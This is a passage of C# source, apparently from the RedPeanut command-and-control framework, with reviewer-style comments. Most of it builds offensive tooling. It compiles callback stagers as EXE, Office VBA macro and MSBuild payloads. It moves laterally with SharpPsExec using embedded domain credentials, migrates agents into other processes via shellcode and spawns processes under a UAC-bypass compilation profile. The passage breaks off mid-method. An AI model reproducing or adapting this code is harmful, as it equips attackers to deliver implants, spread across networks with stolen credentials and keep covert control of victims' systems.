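/// <summary>
/// Updates the persisted <c>Listener</c> row matching the config's name
/// (host, port, profile id and HTTP/HTTPS type) and drops the in-memory entry.
/// </summary>
/// <param name="listenername">Name of the listener being updated. The lookup
/// uses <c>listenerconfig.GetName()</c>, exactly as the original did, so this
/// value is expected to agree with it.</param>
/// <param name="listenerconfig">New listener settings.</param>
/// <remarks>
/// The in-memory <c>listeners</c> entry is removed and not re-added; callers
/// re-register the new config themselves (unchanged from the original).
/// A missing row used to surface as a NullReferenceException reported as a
/// "removing" error; it is now reported explicitly. Failures are printed and
/// swallowed.
/// </remarks>
public void UpdateListenerConfig(string listenername, ListenerConfig listenerconfig)
{
    try
    {
        string name = listenerconfig.GetName();
        listeners.Remove(name);

        Listener res = dbcontext.Listeners.FirstOrDefault<Listener>(s => s.name == name);
        if (res == null)
        {
            Console.WriteLine("[x] Listener {0} not found", name);
            return;
        }

        res.name = name;
        res.lhost = listenerconfig.GetHost();
        res.lport = listenerconfig.GetPort();
        res.profile = listenerconfig.GetProfileid();
        res.ListenerType = listenerconfig.GetSsl() ? ListenerType.Https : ListenerType.Http;

        dbcontext.Listeners.Update(res);
        dbcontext.SaveChanges();
    }
    catch (Exception e)
    {
        // Message corrected: this path updates a listener, it does not remove one.
        Console.WriteLine("[x] Error updating listener {0}", e.Message);
    }
}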
/// <summary>
/// Spins up the HTTP(S) listener described by <paramref name="lconfig"/> on a
/// dedicated thread and flags the config as started.
/// </summary>
/// <param name="lconfig">Listener configuration handed to the new RedPeanutC2 instance.</param>
public void StartServerHttpServer(ListenerConfig lconfig)
{
    RedPeanutC2 listener = new RedPeanutC2(this, lconfig);
    Thread worker = new Thread(listener.Execute);

    httplistener = listener;
    servert = worker;

    worker.Start();
    lconfig.SetStarted(true);
}
// Send agentid — RC4 with serverkey (original note).
//
// Builds the "agent id" message: the agent id, the agent's per-session AES
// key and IV, and a base64/gzip agent assembly compiled from AGENT_TEMPLATE
// for the agent's listener address/port and the given profile. The JSON
// payload is then encrypted with serverkey via EncryptMessage.
//
// Returns "" when profileid is not a registered profile.
// NOTE(review): the session key/IV are carried inside this message, so its
// confidentiality rests entirely on serverkey and on EncryptMessage.
private string CreateMsgAgentId(IAgentInstance agent, string serverkey, int profileid, int targetframework)
{
    string mesg = "";
    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
    {
        AesManaged aes = agent.AesManager;
        AgentIdMsg msg = new AgentIdMsg
        {
            agentid = agent.AgentId,
            sessionkey = aes.Key,
            sessioniv = aes.IV
        };
        HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);
        // Listener config is rebuilt from the agent's own address/port
        // (presumably so the compiled agent targets the endpoint it arrived on).
        ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), profile, profileid);
        string source = System.IO.File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
        // serverkey is passed to EncryptMessage below; the template replacer
        // re-reads the key from Program itself.
        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
        msg.stage = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", targetframework, compprofile: CompilationProfile.Agent)));
        string agentidnmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
        mesg = EncryptMessage(serverkey, agentidnmsg);
    }
    return(mesg);
}
// Task body: compiles a stager executable from STAGER_TEMPLATE for the
// configured lhost/lport/profile and writes it through Builder.GenerateExe.
// Returns silently when filename, lhost, lport or profile is unset, or when
// the profile id is unknown; any other error is printed and swallowed.
// `args` is allocated but never used.
private void Run()
{
    List<string> args = new List<string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Parse the .cs template source and replace the placeholders.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                // 40 is the hard-coded target framework value written into the
                // template (#FRAMEWORK#); elsewhere only 35 and 40 are accepted.
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                Builder.GenerateExe(source, filename);
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
// Task body: builds, in order, (1) a stager assembly from STAGER_TEMPLATE
// (HTTP callback when lpipename is null, named-pipe pivot otherwise),
// (2) a service executable from SERVICE_TEMPLATE that carries the stager as
// shellcode, and (3) a SharpPsExec assembly from SHARPSEXEC_TEMPLATE that
// carries the service plus the target host, credentials and service names,
// which is finally run through the current agent.
// Returns silently when a required field is missing (username, password,
// domain, targethost, lhost, profile, and lport or lpipename), when the
// profile id is unknown, or when `agent` is null. No exception handling.
// `args` is allocated but never used.
// NOTE(review): domain/username/password are substituted into generated C#
// source as plain string literals and therefore persist inside the compiled
// assembly; nothing here scrubs them afterwards.
private void Run()
{
    List<string> args = new List<string>();
    if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
    {
        return;
    }
    else
    {
        // Create the stager stream (gzip).
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
            if (lpipename == null)
            {
                // HTTP stager, no pivot.
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            }
            else
            {
                // Named-pipe (pivot) stager.
                ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            }
            string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
            // Create the TaskMsg (gzip).
            if (agent != null)
            {
                // Create the service stream (gzip).
                // NOTE(review): `RandomString` here vs `RandomAString` everywhere
                // else — two different helpers or a typo; confirm.
                source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                    .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                    .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
                // Fourth positional argument "exe" selects the output type.
                string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
                // Create the SharpPsExec stream (gzip); unset display/description/
                // service names fall back to random strings.
                source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                    .Replace("#DOMAIN#", domain)
                    .Replace("#USERNAME#", username)
                    .Replace("#PASSWORD#", password)
                    .Replace("#HOSTANME#", targethost)
                    .Replace("#ASSEMBLY#", servicestr)
                    .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                    .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                    .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                    .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
                string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                // "pippo" is a placeholder argument; the entry point ignores it as far as visible here.
                RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
            }
        }
    }
}
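/// <summary>
/// At startup, rebuilds an in-memory <c>ListenerConfig</c> for every listener
/// persisted in the database and starts its HTTP(S) server.
/// </summary>
/// <param name="srv">Server whose DB context, profiles and listener table are used.</param>
/// <remarks>
/// A stored profile id that is zero or unknown resolves to the server's
/// default profile, but — as in the original — the stored id is still what
/// goes into the config, so the persisted row keeps that id.
/// The original duplicated the whole body in both branches; only the profile
/// lookup differed.
/// </remarks>
static private void CheckConfiguredListeners(C2Server srv)
{
    RedPeanutDBContext context = srv.GetDBContext();
    if (!context.Listeners.Any())
    {
        return;
    }

    Console.WriteLine("[*] Starting listeners");
    foreach (Listener l in context.Listeners)
    {
        int profileid = l.profile;
        bool ssl = l.ListenerType == ListenerType.Https;

        bool knownProfile = profileid != 0 && srv.GetProfiles().ContainsKey(profileid);
        HttpProfile profile = srv.GetProfile(knownProfile ? profileid : srv.GetDefaultProfile());

        ListenerConfig conf = new ListenerConfig(l.name, l.lhost, l.lport, profile, profileid, ssl);
        srv.ReloadListenerConfig(l.name, conf);
        srv.StartServerHttpServer(conf);
    }
}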
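/// <summary>
/// Registers and starts an HTTP(S) listener from the menu fields
/// (name, lhost, lport, profileid, ssl) unless one with that name is already running.
/// </summary>
/// <remarks>
/// A zero or unknown profile id is replaced by the server default and
/// <c>profileid</c> is overwritten so the persisted row records the profile
/// actually used. The validation message is corrected: this listener has no
/// pipename; the fields checked are name, lhost and lport.
/// </remarks>
private void Run()
{
    if (srv.IsStarted(name))
    {
        Console.WriteLine("[-] Server running");
        return;
    }

    if (string.IsNullOrEmpty(name) || string.IsNullOrEmpty(lhost) || lport <= 0)
    {
        Console.WriteLine("[-] name, lhost and lport can't be empty");
        return;
    }

    HttpProfile profile;
    if (profileid != 0 && srv.GetProfiles().ContainsKey(profileid))
    {
        profile = srv.GetProfile(profileid);
    }
    else
    {
        profileid = srv.GetDefaultProfile();
        profile = srv.GetProfile(profileid);
    }

    ListenerConfig conf = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
    srv.RegisterListenerConfig(name, conf);
    srv.StartServerHttpServer(conf);
}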
/// <summary>
/// Fills the shooter template: <c>#HOST#</c> and <c>#PORT#</c> come from the
/// listener config, <c>#RESURLCEURL#</c> (the template's own spelling) from
/// <paramref name="resourceurl"/>.
/// </summary>
/// <returns>The template text with the three placeholders replaced.</returns>
public static string ReplaceAgentShooter(string src, string resourceurl, ListenerConfig config)
{
    string host = config.GetHost();
    string port = config.GetPort().ToString();

    string result = src.Replace("#HOST#", host);
    result = result.Replace("#PORT#", port);
    result = result.Replace("#RESURLCEURL#", resourceurl);
    return result;
}
// Task body: produces a VBA script (VBAGenerator) in
// WORKSPACE_FOLDER/EVILCLIPPY_FOLDER/filename. Steps, in order: compile a
// stager DLL from STAGER_TEMPLATE (target framework 35) and publish it as a
// web resource under the profile's ContentUri, then compile a "shooter" DLL
// from SHOOTER_TEMPLATE pointing at that resource path and hand its base64
// to the generator.
// Returns silently when filename, lhost, lport or profile is unset or the
// profile id is unknown; other errors are printed and swallowed.
// `args` is allocated but never used.
private void Run()
{
    List<string> args = new List<string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Parse the .cs template source and replace the placeholders.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                // Build the stager DLL under a random name.
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                string outfilename = RandomAString(10, new Random()) + ".dll";
                Builder.GenerateDll(source, outfilename, 35);
                // Register it with the web server; a null generator presumably
                // means the resource is served from the built file — confirm.
                C2Manager c2manager = Program.GetC2Manager();
                c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));
                // Resource path = profile ContentUri (no leading slash, trailing slash ensured) + file name.
                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                if (!uricontent.EndsWith("/"))
                {
                    uricontent += "/";
                }
                string resourcepath = uricontent + outfilename;
                // Build the shooter assembly that references that resource.
                source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);
                string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);
                VBAGenerator gen = new VBAGenerator(assemblyBase64, null);
                // Write the script to the destination directory.
                string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
                File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText());
                Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename));
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
// Task body: builds an MSBuild project file (MSBuildGenerator) embedding a
// gzip/base64 stager DLL compiled from STAGER_TEMPLATE (target framework 40),
// with "#{taskname}" substituted from `taskname`. When `hosted` is true the
// generator is registered as a web resource under `filename`; otherwise the
// script text is written to the system temp directory.
// Returns silently when filename, lhost, lport or profile is unset or the
// profile id is unknown; other errors are printed and swallowed.
// `args` is allocated but never used.
private void Run()
{
    List<string> args = new List<string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Parse the .cs template source and replace the placeholders.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                // GenerateDllBase64 already returns base64; it is decoded only to
                // gzip the raw bytes and re-encode them.
                string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
                byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));
                Dictionary<string, string> msbuildargs = new Dictionary<string, string>();
                msbuildargs.Add("#{taskname}", taskname);
                MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs);
                if (hosted)
                {
                    // Add the resource to the web server storage.
                    C2Manager c2manager = Program.GetC2Manager();
                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                    Console.WriteLine("[*] Resource added to webserver resources");
                    return;
                }
                else
                {
                    // Write the file to the temp directory.
                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
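/// <summary>
/// Removes a listener from the in-memory table and deletes its persisted row.
/// </summary>
/// <param name="listenerconfig">Config whose name identifies the listener.</param>
/// <remarks>
/// When no row exists for the name the original passed <c>null</c> to
/// <c>Remove</c>, which threw and was reported as a generic error; that case
/// now returns quietly after the in-memory removal. Other failures are
/// printed with their message (matching the sibling add/reload methods) and swallowed.
/// </remarks>
public void RemoveListenerConfig(ListenerConfig listenerconfig)
{
    try
    {
        string name = listenerconfig.GetName();
        listeners.Remove(name);

        Listener res = dbcontext.Listeners.FirstOrDefault<Listener>(s => s.name == name);
        if (res == null)
        {
            return;
        }

        dbcontext.Listeners.Remove(res);
        dbcontext.SaveChanges();
    }
    catch (Exception e)
    {
        Console.WriteLine("[x] Error removing listener {0}", e.Message);
    }
}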
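/// <summary>
/// Handles one console line in the per-listener sub-menu: "remove",
/// "set listenername", "options" and "back"; any other known key prints the
/// fallback message, an unknown one prints the option list.
/// </summary>
/// <param name="input">Raw console line; an empty line is ignored.</param>
/// <remarks>
/// "remove" cancels the listener's token and deletes its config. The original
/// swallowed any exception on that path silently; it is now printed so a
/// half-removed listener is visible on the console.
/// </remarks>
private void ListenerMenu(string input)
{
    string f_input = ParseSelection(input);
    if (string.IsNullOrEmpty(input))
    {
        return;
    }

    string command = f_input.TrimEnd();
    if (!mainmenu.ContainsKey(command))
    {
        PrintOptionsNoStd("Command not found", mainmenu);
        return;
    }

    switch (command)
    {
        case "remove":
        {
            var configs = Program.GetC2Manager().GetC2Server().GetListenersConfig();
            if (configs.ContainsKey(listenername))
            {
                try
                {
                    ListenerConfig lc = configs[listenername];
                    lc.CancellationTokenSource.Cancel();
                    Program.GetC2Manager().GetC2Server().RemoveListenerConfig(lc);
                }
                catch (Exception e)
                {
                    Console.WriteLine("[x] Error removing listener {0}", e.Message);
                }
                exit = true;
            }
            break;
        }
        case "set listenername":
            listenername = GetParsedSetString(input);
            break;
        case "options":
            PrintOptionsNoStd("options", mainmenu);
            break;
        case "back":
            Program.GetMenuStack().Pop();
            exit = true;
            return;
        default:
            Console.WriteLine("We had a woodoo");
            break;
    }
}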
// Moves the current agent into process `pid`. Steps, in order: recompile the
// agent assembly from AGENT_TEMPLATE for the agent's listener/profile and
// target framework; serialise an AgentState (agent id, session AES key/IV,
// HTTP cookie, a fresh request instance id and, when pivoting, the pivot's
// agent id as pipe name) to gzip/base64 and split it into 100-character
// chunks used as arguments; wrap the agent in shellcode via
// Builder.GenerateShellcode; embed that and `pid` in MIGRATE_TEMPLATE; compile
// and run it on the agent as task type "migrate" with the new instance id.
// No validation of `pid` and no exception handling in this method.
// NOTE(review): the session key/IV are serialised into the state blob and
// carried inside the migrated assembly.
private void RunMigrate(int pid)
{
    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
    // Create the RedPeanutAgent assembly.
    string source = File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
    ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), RedPeanutC2.server.GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid());
    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), ((AgentInstanceHttp)agent).TargetFramework, conf);
    string b64CompressedAgent = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Agent)));
    string instanceid = RandomAString(10, new Random());
    // Create the AgentState carried over to the new process.
    AgentState astate = new AgentState
    {
        Agentid = agent.AgentId,
        sessionkey = agent.AesManager.Key,
        sessioniv = agent.AesManager.IV,
        cookie = ((AgentInstanceHttp)agent).Cookie,
        RequestInstanceid = instanceid
    };
    if (agent.Pivoter != null)
    {
        astate.pipename = agent.Pivoter.AgentId;
    }
    // Encoding.Default is platform-dependent; the JSON here is ASCII-safe as
    // long as the ids and cookie are.
    string b64State = Convert.ToBase64String(Utility.CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(astate, Formatting.Indented))));
    string[] argsm = Utility.Split(b64State, 100).ToArray();
    // Read the migrate template.
    source = File.ReadAllText(Path.Combine(folderrpath, MIGRATE_TEMPLATE));
    // Replace placeholders with the shellcode-wrapped agent and the target pid.
    source = Replacer.ReplaceMigrate(source, Convert.ToBase64String(CompressGZipAssembly(
        Builder.GenerateShellcode(b64CompressedAgent, RandomAString(10, new Random()) + ".exe", "RedPeanutAgent.Worker", "LoadAndRun", argsm)
    )), pid);
    // Compile and run.
    string migrate = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Migrate)));
    RunAssemblyBase64(
        migrate,
        "RedPeanutMigrate",
        new string[] { " " },
        agent,
        tasktype: "migrate",
        instanceid: instanceid);
}
/// <summary>
/// Prints one console line per registered listener: name, host, port and profile id.
/// A listener whose getters throw is reported as needing removal instead.
/// </summary>
public void ListListeners()
{
    var configs = GetListenersConfig();
    if (configs == null)
    {
        return;
    }

    foreach (KeyValuePair<string, ListenerConfig> entry in configs)
    {
        try
        {
            ListenerConfig cfg = entry.Value;
            Console.WriteLine("[*] {0} | Host: {1} | port: {2} | profile: {3}", cfg.GetName(), cfg.GetHost(), cfg.GetPort(), cfg.GetProfileid());
        }
        catch (Exception e)
        {
            Console.WriteLine("[x] Listener need to be removed {0}", e.Message);
        }
    }
}
/// <summary>
/// Adds a listener config to the in-memory table only (no database write);
/// used when re-creating listeners that are already persisted.
/// </summary>
/// <param name="listenername">Key in the in-memory table.</param>
/// <param name="listenerconfig">Config to store under that key.</param>
/// <remarks>A duplicate name or any exception is reported on the console and swallowed.</remarks>
public void ReloadListenerConfig(string listenername, ListenerConfig listenerconfig)
{
    try
    {
        if (listeners.ContainsKey(listenername))
        {
            Console.WriteLine("[x] Listener already exist");
            return;
        }

        listeners.Add(listenername, listenerconfig);
    }
    catch (Exception e)
    {
        Console.WriteLine("[x] Error adding listener {0}", e.Message);
    }
}
/// <summary>
/// Adds a listener config to the in-memory table and, if no row with that
/// name is persisted yet, stores it in the database.
/// </summary>
/// <param name="listenername">Key in the in-memory table.</param>
/// <param name="listenerconfig">Config whose name/host/port/profile/SSL flag are persisted.</param>
/// <remarks>A duplicate name or any exception is reported on the console and swallowed.</remarks>
public void RegisterListenerConfig(string listenername, ListenerConfig listenerconfig)
{
    try
    {
        if (listeners.ContainsKey(listenername))
        {
            Console.WriteLine("[x] Listener already exist");
            return;
        }

        listeners.Add(listenername, listenerconfig);

        Listener existing = dbcontext.Listeners.FirstOrDefault<Listener>(s => s.name == listenername);
        if (existing != null)
        {
            return;
        }

        Listener row = new Listener
        {
            name = listenerconfig.GetName(),
            lhost = listenerconfig.GetHost(),
            lport = listenerconfig.GetPort(),
            profile = listenerconfig.GetProfileid(),
            ListenerType = listenerconfig.GetSsl() ? ListenerType.Https : ListenerType.Http
        };
        dbcontext.Listeners.Add(row);
        dbcontext.SaveChanges();
    }
    catch (Exception e)
    {
        Console.WriteLine("[x] Error adding listener {0}", e.Message);
    }
}
/// <summary>
/// Prints the registered listeners as a fixed-width table
/// (Name, IP, Port, Profile, SSL). A listener whose getters throw is reported
/// as needing removal instead of a row.
/// </summary>
public void ListListeners()
{
    var configs = GetListenersConfig();
    if (configs == null)
    {
        return;
    }

    string rule = new string('-', 66);
    const string rowFormat = "[*] | {0,-20} | {1,-15} | {2,-5} | {3,-7} | {4,-5} |";

    Console.WriteLine("[*] {0}", rule);
    Console.WriteLine(rowFormat, "Name", "IP", "Port", "Profile", "SSL");
    Console.WriteLine("[*] {0}", rule);

    foreach (KeyValuePair<string, ListenerConfig> entry in configs)
    {
        try
        {
            ListenerConfig cfg = entry.Value;
            Console.WriteLine(rowFormat, cfg.GetName(), cfg.GetHost(), cfg.GetPort(), cfg.GetProfileid(), cfg.GetSsl());
        }
        catch (Exception e)
        {
            Console.WriteLine("[x] Listener need to be removed {0}", e.Message);
        }
    }

    Console.WriteLine("[*] {0}", rule);
}
// Task body: builds a stager for the current agent's listener (HTTP, or a
// named pipe named after the agent id when the agent has a Pivoter), wraps it
// in a "module" TaskMsg, and compiles SPAWN_TEMPLATE with that task, the
// profile's Spawn value and the supplied username/password/domain; the
// result is run on the agent as "RedPeanutSpawn".
// Does nothing when the resolved profile id is unknown; any exception is
// reported with a fixed message (no details) and swallowed.
// NOTE(review): username/password/domain are substituted into generated C#
// source as plain string literals and persist inside the compiled assembly.
private void Run()
{
    try
    {
        string host = ((AgentInstanceHttp)agent).GetAddress();
        int port = ((AgentInstanceHttp)agent).GetPort();
        int profileid = ((AgentInstanceHttp)agent).GetProfileid();
        int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
        string pipename = "";
        if (agent.Pivoter != null)
        {
            // Pivoted agent: callback goes to the pivot's IP over a named pipe
            // using the default profile.
            host = agent.Pivoter.SysInfo.Ip;
            port = 0;
            profileid = RedPeanutC2.server.GetDefaultProfile();
            targetframework = agent.TargetFramework;
            pipename = agent.AgentId;
        }
        else
        {
            // Re-assigns the values already read above (redundant, kept as is),
            // except targetframework which now comes from the base agent.
            host = ((AgentInstanceHttp)agent).GetAddress();
            port = ((AgentInstanceHttp)agent).GetPort();
            profileid = ((AgentInstanceHttp)agent).GetProfileid();
            targetframework = agent.TargetFramework;
        }
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
        {
            string source;
            if (string.IsNullOrEmpty(pipename))
            {
                // HTTP stager, no pivot.
                ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
            }
            else
            {
                // Named-pipe (pivot) stager.
                ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
            }
            string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
            ModuleConfig modconfig = new ModuleConfig
            {
                Assembly = stagerstr,
                Method = "Execute",
                Moduleclass = "RedPeanutRP",
                Parameters = new string[] { "pippo" }
            };
            TaskMsg task = new TaskMsg
            {
                TaskType = "module",
                ModuleTask = modconfig,
                Agentid = agent.AgentId
            };
            if (agent.Pivoter != null)
            {
                task.AgentPivot = agent.Pivoter.AgentId;
            }
            // Replace(old, null) removes the placeholder (null acts as "").
            source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
                .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                .Replace("#SHELLCODE#", null)
                .Replace("#USERNAME#", username)
                .Replace("#PASSWORD#", password)
                .Replace("#DOMAIN#", domain)
                .Replace("#PROCESS#", null);
            string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
            RunAssemblyBase64(
                spawnprocess,
                "RedPeanutSpawn",
                new string[] { " " },
                agent);
        }
    }
    catch (Exception)
    {
        // "Errore" is the original (Italian) message text; it is a runtime string and left unchanged.
        Console.WriteLine("[*] Errore generating task");
    }
}
// Task body: variant of the service/SharpPsExec flow in which the stager is
// delivered as a "module" TaskMsg (gzip/base64 JSON under #TASK#) together
// with the NUTCLR resource under #NUTCLR#, instead of as shellcode. Steps, in
// order: compile a stager from STAGER_TEMPLATE (HTTP when lpipename is null,
// named-pipe pivot otherwise); build the TaskMsg; compile SERVICE_TEMPLATE
// into an exe; compile SHARPSEXEC_TEMPLATE with that exe, the target host,
// credentials and service names; run it through the current agent.
// Returns silently when a required field is missing (username, password,
// domain, targethost, lhost, profile, and lport or lpipename), when the
// profile id is unknown, or when `agent` is null. No exception handling.
// `args` is allocated but never used. Unlike the sibling variant, the stager
// assembly name here has no ".dll" suffix.
// NOTE(review): domain/username/password are substituted into generated C#
// source as plain string literals and persist inside the compiled assembly.
private void Run()
{
    List<string> args = new List<string>();
    if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
    {
        return;
    }
    else
    {
        // Create the stager stream (gzip).
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
            if (lpipename == null)
            {
                // HTTP stager, no pivot.
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            }
            else
            {
                // Named-pipe (pivot) stager.
                ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            }
